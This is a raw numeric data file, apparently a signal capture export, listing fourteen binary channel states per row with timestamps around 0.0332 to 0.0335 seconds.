0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246708e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246856e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246880e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246908e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247056e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247080e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247108e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247204e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247228e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247256e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247280e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247308e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247404e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247456e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247604e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247656e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247680e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247708e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247856e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247880e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247908e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3247956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3247980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3248004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3248028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3248056e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3248080e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3248108e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,3.3372808e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.3373020e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,3.3373036e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.3373068e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,3.3373372e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.3373396e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3373404e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3373420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3373444e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3373468e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3373492e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3373516e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3373544e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3373568e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3373596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3373620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373644e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3373668e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373692e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3373716e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373744e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3373768e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3373844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373868e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3373876e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3373920e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3373944e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,3.3373948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373952e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3373972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3373996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374044e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374068e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374092e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374116e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374144e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374168e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374244e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374268e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374292e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374316e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374344e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374368e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374444e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3374448e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3374492e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3374516e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374544e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374568e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374596e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374644e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374668e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374692e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374716e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374744e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374768e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374868e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374920e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374944e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3374964e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3374996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375020e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375044e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375068e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375092e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375116e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375144e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375164e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375196e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3375220e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375244e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3375268e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375292e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3375316e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375344e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3375368e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375396e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3375420e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375444e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3375492e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3375516e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375544e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375568e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375596e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375620e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375644e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375668e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375692e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375716e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375744e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375768e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375820e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375844e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375868e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375892e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375916e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375944e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3375968e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3375996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376020e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376044e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376068e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376092e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376116e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376144e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376168e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376196e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376220e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376244e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376292e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376316e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376344e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376368e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376444e-02 1,0,1,1,0,0,0,0,0,1,0,0,0,0,3.3376448e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3376452e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.3376492e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3376516e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376544e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376568e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376596e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376624e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376648e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376676e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376824e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376848e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3376972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3376996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377024e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377048e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377076e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3377972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3377996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378872e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3378972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3378996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379044e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379072e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379096e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379244e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379272e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379296e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379444e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379472e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379496e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379644e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379696e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379844e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379872e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3379924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3379952e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.3379956e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.3504712e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,3.3504940e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3504964e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,3.3504988e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3505016e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,3.3505324e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.3505348e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,1,3.3505352e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3505356e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3505372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3505396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3505420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3505444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3505472e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.3505496e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.3505524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505548e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3505572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3505620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3505672e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505696e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3505748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505772e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,3.3505776e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3505780e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3505796e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3505820e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3505872e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3505896e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505904e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3505924e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505948e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3505972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3505996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506072e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506144e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506344e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506368e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3506396e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3506444e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3506468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506476e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506516e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506568e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506744e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506768e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506820e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3506824e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.3506868e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.3506892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506900e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506920e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506944e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.3506968e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.3506996e-02 